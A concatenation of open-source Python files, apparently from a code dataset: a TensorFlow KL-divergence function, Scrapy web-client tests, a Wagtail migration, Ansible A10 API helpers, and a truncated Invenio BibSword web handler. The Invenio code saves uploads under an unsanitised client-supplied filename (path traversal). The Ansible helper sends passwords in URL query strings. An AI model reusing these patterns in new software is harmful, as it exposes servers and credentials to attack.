@kullback_leibler.RegisterKL(Normal, Normal)
def _kl_normal_normal(n_a, n_b, name=None):
"""Calculate the batched KL divergence KL(n_a || n_b) with n_a and n_b Normal.
Args:
n_a: instance of a Normal distribution object.
n_b: instance of a Normal distribution object.
name: (optional) Name to use for created operations.
default is "kl_normal_normal".
Returns:
Batchwise KL(n_a || n_b)
"""
with ops.name_scope(name, "kl_normal_normal", [n_a.loc, n_b.loc]):
one = constant_op.constant(1, dtype=n_a.dtype)
two = constant_op.constant(2, dtype=n_a.dtype)
half = constant_op.constant(0.5, dtype=n_a.dtype)
s_a_squared = math_ops.square(n_a.scale)
s_b_squared = math_ops.square(n_b.scale)
ratio = s_a_squared / s_b_squared
return (math_ops.square(n_a.loc - n_b.loc) / (two * s_b_squared) +
half * (ratio - one - math_ops.log(ratio)))
|
stenskjaer/scrapy
|
refs/heads/master
|
tests/test_webclient.py
|
112
|
"""
from twisted.internet import defer
Tests borrowed from the twisted.web.client tests.
"""
import os
from six.moves.urllib.parse import urlparse
from twisted.trial import unittest
from twisted.web import server, static, error, util
from twisted.internet import reactor, defer
from twisted.test.proto_helpers import StringTransport
from twisted.python.filepath import FilePath
from twisted.protocols.policies import WrappingFactory
from scrapy.core.downloader import webclient as client
from scrapy.http import Request, Headers
def getPage(url, contextFactory=None, *args, **kwargs):
"""Adapted version of twisted.web.client.getPage"""
def _clientfactory(*args, **kwargs):
timeout = kwargs.pop('timeout', 0)
f = client.ScrapyHTTPClientFactory(Request(*args, **kwargs), timeout=timeout)
f.deferred.addCallback(lambda r: r.body)
return f
from twisted.web.client import _makeGetterFactory
return _makeGetterFactory(url, _clientfactory,
contextFactory=contextFactory, *args, **kwargs).deferred
class ParseUrlTestCase(unittest.TestCase):
"""Test URL parsing facility and defaults values."""
def _parse(self, url):
f = client.ScrapyHTTPClientFactory(Request(url))
return (f.scheme, f.netloc, f.host, f.port, f.path)
def testParse(self):
lip = '127.0.0.1'
tests = (
("http://127.0.0.1?c=v&c2=v2#fragment", ('http', lip, lip, 80, '/?c=v&c2=v2')),
("http://127.0.0.1/?c=v&c2=v2#fragment", ('http', lip, lip, 80, '/?c=v&c2=v2')),
("http://127.0.0.1/foo?c=v&c2=v2#frag", ('http', lip, lip, 80, '/foo?c=v&c2=v2')),
("http://127.0.0.1:100?c=v&c2=v2#fragment", ('http', lip+':100', lip, 100, '/?c=v&c2=v2')),
("http://127.0.0.1:100/?c=v&c2=v2#frag", ('http', lip+':100', lip, 100, '/?c=v&c2=v2')),
("http://127.0.0.1:100/foo?c=v&c2=v2#frag", ('http', lip+':100', lip, 100, '/foo?c=v&c2=v2')),
("http://127.0.0.1", ('http', lip, lip, 80, '/')),
("http://127.0.0.1/", ('http', lip, lip, 80, '/')),
("http://127.0.0.1/foo", ('http', lip, lip, 80, '/foo')),
("http://127.0.0.1?param=value", ('http', lip, lip, 80, '/?param=value')),
("http://127.0.0.1/?param=value", ('http', lip, lip, 80, '/?param=value')),
("http://127.0.0.1:12345/foo", ('http', lip+':12345', lip, 12345, '/foo')),
("http://spam:12345/foo", ('http', 'spam:12345', 'spam', 12345, '/foo')),
("http://spam.test.org/foo", ('http', 'spam.test.org', 'spam.test.org', 80, '/foo')),
("https://127.0.0.1/foo", ('https', lip, lip, 443, '/foo')),
("https://127.0.0.1/?param=value", ('https', lip, lip, 443, '/?param=value')),
("https://127.0.0.1:12345/", ('https', lip+':12345', lip, 12345, '/')),
("http://scrapytest.org/foo ", ('http', 'scrapytest.org', 'scrapytest.org', 80, '/foo')),
("http://egg:7890 ", ('http', 'egg:7890', 'egg', 7890, '/')),
)
for url, test in tests:
self.assertEquals(client._parse(url), test, url)
def test_externalUnicodeInterference(self):
"""
L{client._parse} should return C{str} for the scheme, host, and path
elements of its return tuple, even when passed an URL which has
previously been passed to L{urlparse} as a C{unicode} string.
"""
badInput = u'http://example.com/path'
goodInput = badInput.encode('ascii')
urlparse(badInput)
scheme, netloc, host, port, path = self._parse(goodInput)
self.assertTrue(isinstance(scheme, str))
self.assertTrue(isinstance(netloc, str))
self.assertTrue(isinstance(host, str))
self.assertTrue(isinstance(path, str))
self.assertTrue(isinstance(port, int))
class ScrapyHTTPPageGetterTests(unittest.TestCase):
def test_earlyHeaders(self):
# basic test stolen from twisted HTTPageGetter
factory = client.ScrapyHTTPClientFactory(Request(
url='http://foo/bar',
body="some data",
headers={
'Host': 'example.net',
'User-Agent': 'fooble',
'Cookie': 'blah blah',
'Content-Length': '12981',
'Useful': 'value'}))
self._test(factory,
"GET /bar HTTP/1.0\r\n"
"Content-Length: 9\r\n"
"Useful: value\r\n"
"Connection: close\r\n"
"User-Agent: fooble\r\n"
"Host: example.net\r\n"
"Cookie: blah blah\r\n"
"\r\n"
"some data")
# test minimal sent headers
factory = client.ScrapyHTTPClientFactory(Request('http://foo/bar'))
self._test(factory,
"GET /bar HTTP/1.0\r\n"
"Host: foo\r\n"
"\r\n")
# test a simple POST with body and content-type
factory = client.ScrapyHTTPClientFactory(Request(
method='POST',
url='http://foo/bar',
body='name=value',
headers={'Content-Type': 'application/x-www-form-urlencoded'}))
self._test(factory,
"POST /bar HTTP/1.0\r\n"
"Host: foo\r\n"
"Connection: close\r\n"
"Content-Type: application/x-www-form-urlencoded\r\n"
"Content-Length: 10\r\n"
"\r\n"
"name=value")
# test a POST method with no body provided
factory = client.ScrapyHTTPClientFactory(Request(
method='POST',
url='http://foo/bar'
))
self._test(factory,
"POST /bar HTTP/1.0\r\n"
"Host: foo\r\n"
"Content-Length: 0\r\n"
"\r\n")
# test with single and multivalued headers
factory = client.ScrapyHTTPClientFactory(Request(
url='http://foo/bar',
headers={
'X-Meta-Single': 'single',
'X-Meta-Multivalued': ['value1', 'value2'],
}))
self._test(factory,
"GET /bar HTTP/1.0\r\n"
"Host: foo\r\n"
"X-Meta-Multivalued: value1\r\n"
"X-Meta-Multivalued: value2\r\n"
"X-Meta-Single: single\r\n"
"\r\n")
# same test with single and multivalued headers but using Headers class
factory = client.ScrapyHTTPClientFactory(Request(
url='http://foo/bar',
headers=Headers({
'X-Meta-Single': 'single',
'X-Meta-Multivalued': ['value1', 'value2'],
})))
self._test(factory,
"GET /bar HTTP/1.0\r\n"
"Host: foo\r\n"
"X-Meta-Multivalued: value1\r\n"
"X-Meta-Multivalued: value2\r\n"
"X-Meta-Single: single\r\n"
"\r\n")
def _test(self, factory, testvalue):
transport = StringTransport()
protocol = client.ScrapyHTTPPageGetter()
protocol.factory = factory
protocol.makeConnection(transport)
self.assertEqual(
set(transport.value().splitlines()),
set(testvalue.splitlines()))
return testvalue
def test_non_standard_line_endings(self):
# regression test for: http://dev.scrapy.org/ticket/258
factory = client.ScrapyHTTPClientFactory(Request(
url='http://foo/bar'))
protocol = client.ScrapyHTTPPageGetter()
protocol.factory = factory
protocol.headers = Headers()
protocol.dataReceived("HTTP/1.0 200 OK\n")
protocol.dataReceived("Hello: World\n")
protocol.dataReceived("Foo: Bar\n")
protocol.dataReceived("\n")
self.assertEqual(protocol.headers,
Headers({'Hello': ['World'], 'Foo': ['Bar']}))
from twisted.web.test.test_webclient import ForeverTakingResource, \
ErrorResource, NoLengthResource, HostHeaderResource, \
PayloadResource, BrokenDownloadResource
class WebClientTestCase(unittest.TestCase):
def _listen(self, site):
return reactor.listenTCP(0, site, interface="127.0.0.1")
def setUp(self):
name = self.mktemp()
os.mkdir(name)
FilePath(name).child("file").setContent("0123456789")
r = static.File(name)
r.putChild("redirect", util.Redirect("/file"))
r.putChild("wait", ForeverTakingResource())
r.putChild("error", ErrorResource())
r.putChild("nolength", NoLengthResource())
r.putChild("host", HostHeaderResource())
r.putChild("payload", PayloadResource())
r.putChild("broken", BrokenDownloadResource())
self.site = server.Site(r, timeout=None)
self.wrapper = WrappingFactory(self.site)
self.port = self._listen(self.wrapper)
self.portno = self.port.getHost().port
def tearDown(self):
return self.port.stopListening()
def getURL(self, path):
return "http://127.0.0.1:%d/%s" % (self.portno, path)
def testPayload(self):
s = "0123456789" * 10
return getPage(self.getURL("payload"), body=s).addCallback(self.assertEquals, s)
def testHostHeader(self):
# if we pass Host header explicitly, it should be used, otherwise
# it should extract from url
return defer.gatherResults([
getPage(self.getURL("host")).addCallback(self.assertEquals, "127.0.0.1:%d" % self.portno),
getPage(self.getURL("host"), headers={"Host": "www.example.com"}).addCallback(self.assertEquals, "www.example.com")])
def test_getPage(self):
"""
L{client.getPage} returns a L{Deferred} which is called back with
the body of the response if the default method B{GET} is used.
"""
d = getPage(self.getURL("file"))
d.addCallback(self.assertEquals, "0123456789")
return d
def test_getPageHead(self):
"""
L{client.getPage} returns a L{Deferred} which is called back with
the empty string if the method is C{HEAD} and there is a successful
response code.
"""
def _getPage(method):
return getPage(self.getURL("file"), method=method)
return defer.gatherResults([
_getPage("head").addCallback(self.assertEqual, ""),
_getPage("HEAD").addCallback(self.assertEqual, "")])
def test_timeoutNotTriggering(self):
"""
When a non-zero timeout is passed to L{getPage} and the page is
retrieved before the timeout period elapses, the L{Deferred} is
called back with the contents of the page.
"""
d = getPage(self.getURL("host"), timeout=100)
d.addCallback(self.assertEquals, "127.0.0.1:%d" % self.portno)
return d
def test_timeoutTriggering(self):
"""
When a non-zero timeout is passed to L{getPage} and that many
seconds elapse before the server responds to the request. the
L{Deferred} is errbacked with a L{error.TimeoutError}.
"""
finished = self.assertFailure(
getPage(self.getURL("wait"), timeout=0.000001),
defer.TimeoutError)
def cleanup(passthrough):
# Clean up the server which is hanging around not doing
# anything.
connected = self.wrapper.protocols.keys()
# There might be nothing here if the server managed to already see
# that the connection was lost.
if connected:
connected[0].transport.loseConnection()
return passthrough
finished.addBoth(cleanup)
return finished
def testNotFound(self):
return getPage(self.getURL('notsuchfile')).addCallback(self._cbNoSuchFile)
def _cbNoSuchFile(self, pageData):
self.assert_('404 - No Such Resource' in pageData)
def testFactoryInfo(self):
url = self.getURL('file')
scheme, netloc, host, port, path = client._parse(url)
factory = client.ScrapyHTTPClientFactory(Request(url))
reactor.connectTCP(host, port, factory)
return factory.deferred.addCallback(self._cbFactoryInfo, factory)
def _cbFactoryInfo(self, ignoredResult, factory):
self.assertEquals(factory.status, '200')
self.assert_(factory.version.startswith('HTTP/'))
self.assertEquals(factory.message, 'OK')
self.assertEquals(factory.response_headers['content-length'], '10')
def testRedirect(self):
return getPage(self.getURL("redirect")).addCallback(self._cbRedirect)
def _cbRedirect(self, pageData):
self.assertEquals(pageData,
'\n<html>\n <head>\n <meta http-equiv="refresh" content="0;URL=/file">\n'
' </head>\n <body bgcolor="#FFFFFF" text="#000000">\n '
'<a href="/file">click here</a>\n </body>\n</html>\n')
|
takeflight/wagtail
|
refs/heads/master
|
wagtail/core/migrations/0002_initial_data.py
|
24
|
# -*- coding: utf-8 -*-
from django.db import migrations
def initial_data(apps, schema_editor):
ContentType = apps.get_model('contenttypes.ContentType')
Group = apps.get_model('auth.Group')
Page = apps.get_model('wagtailcore.Page')
Site = apps.get_model('wagtailcore.Site')
GroupPagePermission = apps.get_model('wagtailcore.GroupPagePermission')
# Create page content type
page_content_type, created = ContentType.objects.get_or_create(
model='page',
app_label='wagtailcore'
)
# Create root page
root = Page.objects.create(
title="Root",
slug='root',
content_type=page_content_type,
path='0001',
depth=1,
numchild=1,
url_path='/',
)
# Create homepage
homepage = Page.objects.create(
title="Welcome to your new Wagtail site!",
slug='home',
content_type=page_content_type,
path='00010001',
depth=2,
numchild=0,
url_path='/home/',
)
# Create default site
Site.objects.create(
hostname='localhost',
root_page_id=homepage.id,
is_default_site=True
)
# Create auth groups
moderators_group = Group.objects.create(name='Moderators')
editors_group = Group.objects.create(name='Editors')
# Create group permissions
GroupPagePermission.objects.create(
group=moderators_group,
page=root,
permission_type='add',
)
GroupPagePermission.objects.create(
group=moderators_group,
page=root,
permission_type='edit',
)
GroupPagePermission.objects.create(
group=moderators_group,
page=root,
permission_type='publish',
)
GroupPagePermission.objects.create(
group=editors_group,
page=root,
permission_type='add',
)
GroupPagePermission.objects.create(
group=editors_group,
page=root,
permission_type='edit',
)
def remove_initial_data(apps, schema_editor):
"""This function does nothing. The below code is commented out together
with an explanation of why we don't need to bother reversing any of the
initial data"""
pass
# This does not need to be deleted, Django takes care of it.
# page_content_type = ContentType.objects.get(
# model='page',
# app_label='wagtailcore',
# )
# Page objects: Do nothing, the table will be deleted when reversing 0001
# Do not reverse Site creation since other models might depend on it
# Remove auth groups -- is this safe? External objects might depend
# on these groups... seems unsafe.
# Group.objects.filter(
# name__in=('Moderators', 'Editors')
# ).delete()
#
# Likewise, we're leaving all GroupPagePermission unchanged as users may
# have been assigned such permissions and its harmless to leave them.
class Migration(migrations.Migration):
dependencies = [
('wagtailcore', '0001_initial'),
]
operations = [
migrations.RunPython(initial_data, remove_initial_data),
]
|
ujenmr/ansible
|
refs/heads/devel
|
lib/ansible/module_utils/network/a10/a10.py
|
52
|
# This code is part of Ansible, but is an independent component.
# This particular file snippet, and this file snippet only, is BSD licensed.
# Modules you write using this snippet, which is embedded dynamically by Ansible
# still belong to the author of the module, and may assign their own license
# to the complete work.
#
# Copyright (c), Michael DeHaan <michael.dehaan@gmail.com>, 2012-2013
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without modification,
# are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED.
# IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE
# USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import json
from ansible.module_utils.urls import fetch_url
AXAPI_PORT_PROTOCOLS = {
'tcp': 2,
'udp': 3,
}
AXAPI_VPORT_PROTOCOLS = {
'tcp': 2,
'udp': 3,
'fast-http': 9,
'http': 11,
'https': 12,
}
def a10_argument_spec():
return dict(
host=dict(type='str', required=True),
username=dict(type='str', aliases=['user', 'admin'], required=True),
password=dict(type='str', aliases=['pass', 'pwd'], required=True, no_log=True),
write_config=dict(type='bool', default=False)
)
def axapi_failure(result):
if 'response' in result and result['response'].get('status') == 'fail':
return True
return False
def axapi_call(module, url, post=None):
'''
Returns a datastructure based on the result of the API call
'''
rsp, info = fetch_url(module, url, data=post)
if not rsp or info['status'] >= 400:
module.fail_json(msg="failed to connect (status code %s), error was %s" % (info['status'], info.get('msg', 'no error given')))
try:
raw_data = rsp.read()
data = json.loads(raw_data)
except ValueError:
# at least one API call (system.action.write_config) returns
# XML even when JSON is requested, so do some minimal handling
# here to prevent failing even when the call succeeded
if 'status="ok"' in raw_data.lower():
data = {"response": {"status": "OK"}}
else:
data = {"response": {"status": "fail", "err": {"msg": raw_data}}}
except Exception:
module.fail_json(msg="could not read the result from the host")
finally:
rsp.close()
return data
def axapi_authenticate(module, base_url, username, password):
url = '%s&method=authenticate&username=%s&password=%s' % (base_url, username, password)
result = axapi_call(module, url)
if axapi_failure(result):
return module.fail_json(msg=result['response']['err']['msg'])
sessid = result['session_id']
return base_url + '&session_id=' + sessid
def axapi_authenticate_v3(module, base_url, username, password):
url = base_url
auth_payload = {"credentials": {"username": username, "password": password}}
result = axapi_call_v3(module, url, method='POST', body=json.dumps(auth_payload))
if axapi_failure(result):
return module.fail_json(msg=result['response']['err']['msg'])
signature = result['authresponse']['signature']
return signature
def axapi_call_v3(module, url, method=None, body=None, signature=None):
'''
Returns a datastructure based on the result of the API call
'''
if signature:
headers = {'content-type': 'application/json', 'Authorization': 'A10 %s' % signature}
else:
headers = {'content-type': 'application/json'}
rsp, info = fetch_url(module, url, method=method, data=body, headers=headers)
if not rsp or info['status'] >= 400:
module.fail_json(msg="failed to connect (status code %s), error was %s" % (info['status'], info.get('msg', 'no error given')))
try:
raw_data = rsp.read()
data = json.loads(raw_data)
except ValueError:
# at least one API call (system.action.write_config) returns
# XML even when JSON is requested, so do some minimal handling
# here to prevent failing even when the call succeeded
if 'status="ok"' in raw_data.lower():
data = {"response": {"status": "OK"}}
else:
data = {"response": {"status": "fail", "err": {"msg": raw_data}}}
except Exception:
module.fail_json(msg="could not read the result from the host")
finally:
rsp.close()
return data
def axapi_enabled_disabled(flag):
'''
The axapi uses 0/1 integer values for flags, rather than strings
or booleans, so convert the given flag to a 0 or 1. For now, params
are specified as strings only so thats what we check.
'''
if flag == 'enabled':
return 1
else:
return 0
def axapi_get_port_protocol(protocol):
return AXAPI_PORT_PROTOCOLS.get(protocol.lower(), None)
def axapi_get_vport_protocol(protocol):
return AXAPI_VPORT_PROTOCOLS.get(protocol.lower(), None)
|
robk5uj/invenio
|
refs/heads/bft2012-01-03
|
modules/bibsword/lib/bibsword_webinterface.py
|
31
|
'''
Forward to ArXiv.org source code
'''
## This file is part of Invenio.
## Copyright (C) 2010, 2011 CERN.
##
## Invenio is free software; you can redistribute it and/or
## modify it under the terms of the GNU General Public License as
## published by the Free Software Foundation; either version 2 of the
## License, or (at your option) any later version.
##
## Invenio is distributed in the hope that it will be useful, but
## WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
## General Public License for more details.
##
## You should have received a copy of the GNU General Public License
## along with Invenio; if not, write to the Free Software Foundation, Inc.,
## 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.
__revision__ = "$Id$"
__lastupdated__ = """$Date$"""
import os
from invenio.access_control_engine import acc_authorize_action
from invenio.config import CFG_SITE_URL, CFG_TMPDIR
from invenio.webuser import page_not_authorized, collect_user_info
from invenio.bibsword_client import perform_display_sub_status, \
perform_display_server_list, \
perform_display_collection_list, \
perform_display_category_list, \
perform_display_metadata, \
perform_submit_record, \
perform_display_server_infos, \
list_remote_servers
from invenio.webpage import page
from invenio.messages import gettext_set_language
from invenio.webinterface_handler import wash_urlargd, WebInterfaceDirectory
from invenio.websubmit_functions.Get_Recid import \
get_existing_records_for_reportnumber
from invenio.search_engine_utils import get_fieldvalues
from invenio.bibsword_config import CFG_MARC_REPORT_NUMBER, CFG_MARC_ADDITIONAL_REPORT_NUMBER
class WebInterfaceSword(WebInterfaceDirectory):
""" Handle /bibsword set of pages."""
_exports = ['', 'remoteserverinfos']
def __init__(self, reqid=None):
'''Initialize'''
self.reqid = reqid
def __call__(self, req, form):
errors = []
warnings = []
body = ''
error_messages = []
#***********************************************************************
# Get values from the form
#***********************************************************************
argd = wash_urlargd(form, {
'ln' : (str, ''),
# information of the state of the form submission
'status' : (str, ''),
'submit' : (str, ''),
'last_row' : (str, ''),
'first_row' : (str, ''),
'offset' : (int, ''),
'total_rows' : (str, ''),
# mendatory informations
'id_record' : (str, ''),
'recid' : (int, 0),
'id_remote_server' : (str, ''),
'id_collection' : (str, ''),
'id_primary' : (str, ''),
'id_categories' : (list, []),
'id' : (str, ''),
'title' : (str, ''),
'summary' : (str, ''),
'author_name' : (str, ''),
'author_email' : (str, ''),
'contributor_name' : (list, []),
'contributor_email' : (list, []),
'contributor_affiliation' : (list, []),
# optionnal informations
'comment' : (str, ''),
'doi' : (str, ''),
'type' : (str, ''),
'journal_refs' : (list, []),
'report_nos' : (list, []),
'media' : (list, []),
'new_media' : (str, ''),
'filename' : (str, '')
})
# set language for i18n text auto generation
_ = gettext_set_language(argd['ln'])
#authentication
(auth_code, auth_message) = self.check_credential(req)
if auth_code != 0:
return page_not_authorized(req=req, referer='/bibsword',
text=auth_message, navtrail='')
user_info = collect_user_info(req)
#Build contributor tuples {name, email and affiliation(s)}
contributors = []
contributor_id = 0
affiliation_id = 0
for name in argd['contributor_name']:
contributor = {}
contributor['name'] = name
contributor['email'] = argd['contributor_email'][contributor_id]
contributor['affiliation'] = []
is_last_affiliation = False
while is_last_affiliation == False and \
affiliation_id < len(argd['contributor_affiliation']):
if argd['contributor_affiliation'][affiliation_id] == 'next':
is_last_affiliation = True
elif argd['contributor_affiliation'][affiliation_id] != '':
contributor['affiliation'].append(\
argd['contributor_affiliation'][affiliation_id])
affiliation_id += 1
contributors.append(contributor)
contributor_id += 1
argd['contributors'] = contributors
# get the uploaded file(s) (if there is one)
for key, formfields in form.items():
if key == "new_media" and hasattr(formfields, "filename") and formfields.filename:
filename = formfields.filename
fp = open(os.path.join(CFG_TMPDIR, filename), "w")
fp.write(formfields.file.read())
fp.close()
argd['media'].append(os.path.join(CFG_TMPDIR, filename))
argd['filename'] = os.path.join(CFG_TMPDIR, filename)
# Prepare navtrail
navtrail = '''<a class="navtrail" ''' \
'''href="%(CFG_SITE_URL)s/help/admin">Admin Area</a>''' \
% {'CFG_SITE_URL': CFG_SITE_URL}
title = _("BibSword Admin Interface")
#***********************************************************************
# Display admin main page
#***********************************************************************
if argd['status'] == '' and argd['recid'] != '' and argd['id_remote_server'] != '':
remote_servers = list_remote_servers(argd['id_remote_server'])
if len(remote_servers) == 0:
error_messages.append("No corresponding remote server could be found")
(body, errors, warnings) = perform_display_server_list(
error_messages,
argd['id_record'])
else:
title = _("Export with BibSword: Step 2/4")
navtrail += ''' > <a class="navtrail" ''' \
'''href="%(CFG_SITE_URL)s/bibsword">''' \
'''SWORD Interface</a>''' % \
{'CFG_SITE_URL' : CFG_SITE_URL}
(body, errors, warnings) = perform_display_collection_list(
argd['id_remote_server'],
argd['id_record'],
argd['recid'],
error_messages)
elif argd['status'] == '' or argd['submit'] == "Cancel":
(body, errors, warnings) = perform_display_sub_status()
elif argd['status'] == 'display_submission':
if argd['submit'] == 'Refresh all':
(body, errors, warnings) = \
perform_display_sub_status(1, argd['offset'], "refresh_all")
elif argd['submit'] == 'Select':
first_row = 1
(body, errors, warnings) = \
perform_display_sub_status(first_row, argd['offset'])
elif argd['submit'] == 'Next':
first_row = int(argd['last_row']) + 1
(body, errors, warnings) = \
perform_display_sub_status(first_row, argd['offset'])
elif argd['submit'] == 'Prev':
first_row = int(argd['first_row']) - int(argd['offset'])
(body, errors, warnings) = \
perform_display_sub_status(first_row, argd['offset'])
elif argd['submit'] == 'First':
(body, errors, warnings) = \
perform_display_sub_status(1, argd['offset'])
elif argd['submit'] == 'Last':
first_row = int(argd['total_rows']) - int(argd['offset']) + 1
(body, errors, warnings) = \
perform_display_sub_status(first_row, argd['offset'])
#***********************************************************************
# Select remote server
#***********************************************************************
# when the user validated the metadata, display
elif argd['submit'] == 'New submission':
title = _("Export with BibSword: Step 1/4")
navtrail += ''' > <a class="navtrail" ''' \
'''href="%(CFG_SITE_URL)s/bibsword">''' \
'''SWORD Interface</a>''' % \
{'CFG_SITE_URL' : CFG_SITE_URL}
(body, errors, warnings) = \
perform_display_server_list(error_messages)
# check if the user has selected a remote server
elif argd['status'] == 'select_server':
title = _("Export with BibSword: Step 1/4")
navtrail += ''' > <a class="navtrail" ''' \
'''href="%(CFG_SITE_URL)s/bibsword">''' \
'''SWORD Interface</a>''' % \
{'CFG_SITE_URL' : CFG_SITE_URL}
# check if given id_record exist and convert it in recid
if argd['recid'] != 0:
report_numbers = get_fieldvalues(argd['recid'], CFG_MARC_REPORT_NUMBER)
report_numbers.extend(get_fieldvalues(argd['recid'], CFG_MARC_ADDITIONAL_REPORT_NUMBER))
if report_numbers:
argd['id_record'] = report_numbers[0]
elif argd['id_record'] == '':
error_messages.append("You must specify a report number")
else:
recids = \
get_existing_records_for_reportnumber(argd['id_record'])
if len(recids) == 0:
error_messages.append(\
"No document found with the given report number")
elif len(recids) > 1:
error_messages.append(\
"Several documents have been found with given the report number")
else:
argd['recid'] = recids[0]
if argd['id_remote_server'] in ['0', '']:
error_messages.append("No remote server was selected")
if not argd['id_remote_server'] in ['0', '']:
# get the server's name and host
remote_servers = list_remote_servers(argd['id_remote_server'])
if len(remote_servers) == 0:
error_messages.append("No corresponding remote server could be found")
argd['id_remote_server'] = '0'
if argd['id_remote_server'] in ['0', ''] or argd['recid'] == 0:
(body, errors, warnings) = perform_display_server_list(
error_messages,
argd['id_record'])
else:
title = _("Export with BibSword: Step 2/4")
(body, errors, warnings) = perform_display_collection_list(
argd['id_remote_server'],
argd['id_record'],
argd['recid'],
error_messages)
#***********************************************************************
# Select collection
#***********************************************************************
# check if the user wants to change the remote server
elif argd['submit'] == 'Modify server':
title = _("Export with BibSword: Step 1/4")
navtrail += ''' > <a class="navtrail" ''' \
'''href="%(CFG_SITE_URL)s/bibsword">''' \
'''SWORD Interface</a>''' % \
{'CFG_SITE_URL' : CFG_SITE_URL}
(body, errors, warnings) = \
perform_display_server_list(error_messages, argd['id_record'])
# check if the user has selected a collection
elif argd['status'] == 'select_collection':
title = _("Export with BibSword: Step 2/4")
navtrail += ''' > <a class="navtrail" ''' \
'''href="%(CFG_SITE_URL)s/bibsword">''' \
'''SWORD Interface</a>''' % \
{'CFG_SITE_URL': CFG_SITE_URL}
if argd['id_collection'] == '0':
error_messages.append("No collection was selected")
(body, errors, warnings) = perform_display_collection_list(
argd['id_remote_server'],
argd['id_record'],
argd['recid'],
error_messages)
else:
title = _("Export with BibSword: Step 3/4")
(body, errors, warnings) = perform_display_category_list(
argd['id_remote_server'],
argd['id_collection'],
argd['id_record'],
argd['recid'],
error_messages)
#***********************************************************************
# Select primary
#***********************************************************************
# check if the user wants to change the collection
elif argd['submit'] == 'Modify collection':
title = _("Export with BibSword: Step 2/4")
navtrail += ''' > <a class="navtrail" ''' \
'''href="%(CFG_SITE_URL)s/bibsword">''' \
'''SWORD Interface</a>''' % \
{'CFG_SITE_URL': CFG_SITE_URL}
(body, errors, warnings) = perform_display_collection_list(
argd['id_remote_server'],
argd['id_record'],
argd['recid'],
error_messages)
# check if the user has selected a primary category
elif argd['status'] == 'select_primary_category':
title = _("Export with BibSword: Step 3/4")
navtrail += ''' > <a class="navtrail" ''' \
'''href="%(CFG_SITE_URL)s/bibsword">''' \
'''SWORD Interface</a>''' % \
{'CFG_SITE_URL' : CFG_SITE_URL}
if argd['id_primary'] == '0':
error_messages.append("No primary category selected")
(body, errors, warnings) = perform_display_category_list(
argd['id_remote_server'],
argd['id_collection'],
argd['id_record'],
argd['recid'],
error_messages)
else:
title = _("Export with BibSword: Step 4/4")
(body, errors, warnings) = perform_display_metadata(user_info,
str(argd['id_remote_server']),
str(argd['id_collection']),
str(argd['id_primary']),
argd['id_categories'],
argd['id_record'],
argd['recid'],
error_messages)
#***********************************************************************
# Check record media and metadata
#***********************************************************************
# check if the user wants to change the collection
elif argd['submit'] == 'Modify destination':
title = _("Export with BibSword: Step 3/4")
navtrail += ''' > <a class="navtrail" ''' \
'''href="%(CFG_SITE_URL)s/bibsword">''' \
'''SWORD Interface</a>''' % \
{'CFG_SITE_URL' : CFG_SITE_URL}
(body, errors, warnings) = perform_display_category_list(
argd['id_remote_server'],
argd['id_collection'],
argd['id_record'],
argd['recid'],
error_messages)
# check if the metadata are complet and well-formed
elif argd['status'] == 'check_submission':
title = _("Export with BibSword: Step 4/4")
navtrail += ''' > <a class="navtrail" ''' \
'''href="%(CFG_SITE_URL)s/bibsword">''' \
'''SWORD Interface</a>''' % \
{'CFG_SITE_URL' : CFG_SITE_URL}
if argd['submit'] == "Upload":
error_messages.append("Media loaded")
if argd['id'] == '':
error_messages.append("Id is missing")
if argd['title'] == '':
error_messages.append("Title is missing")
if argd['summary'] == '':
error_messages.append("summary is missing")
elif len(argd['summary']) < 25:
error_messages.append("summary must have at least 25 character")
if argd['author_name'] == '':
error_messages.append("No submitter name specified")
if argd['author_email'] == '':
error_messages.append("No submitter email specified")
if len(argd['contributors']) == 0:
error_messages.append("No author specified")
if len(error_messages) > 0:
(body, errors, warnings) = perform_display_metadata(user_info,
str(argd['id_remote_server']),
str(argd['id_collection']),
str(argd['id_primary']),
argd['id_categories'],
argd['id_record'],
argd['recid'],
error_messages,
argd)
else:
title = _("Export with BibSword: Acknowledgement")
navtrail += ''' > <a class="navtrail" ''' \
'''href="%(CFG_SITE_URL)s/bibsword">''' \
'''SWORD Interface</a>''' % \
{'CFG_SITE_URL' : CFG_SITE_URL}
(body, errors, warnings) = perform_submit_record(user_info,
str(argd['id_remote_server']),
str(argd['id_collection']),
str(argd['id_primary']),
argd['id_categories'],
argd['recid'],
argd)
# return of all the updated informations to be display
return page(title = title,
body = body,
navtrail = navtrail,
#uid = uid,
lastupdated = __lastupdated__,
req = req,
language = argd['ln'],
#errors = errors,
warnings = warnings,
navmenuid = "yourmessages")
def remoteserverinfos(self, req, form):
'''
This method handle the /bibsword/remoteserverinfos call
'''
argd = wash_urlargd(form, {
'ln' : (str, ''),
'id' : (str, '')
})
#authentication
(auth_code, auth_message) = self.check_credential(req)
if auth_code != 0:
return page_not_authorized(req=req, referer='/bibsword',
text=auth_message, navtrail='')
body = perform_display_server_infos(argd['id'])
navtrail = ''' > <a class="navtrail" ''' \
'''href="%(CFG_SITE_URL)s/bibsword">''' \
'''SWORD Interface</a>''' % \
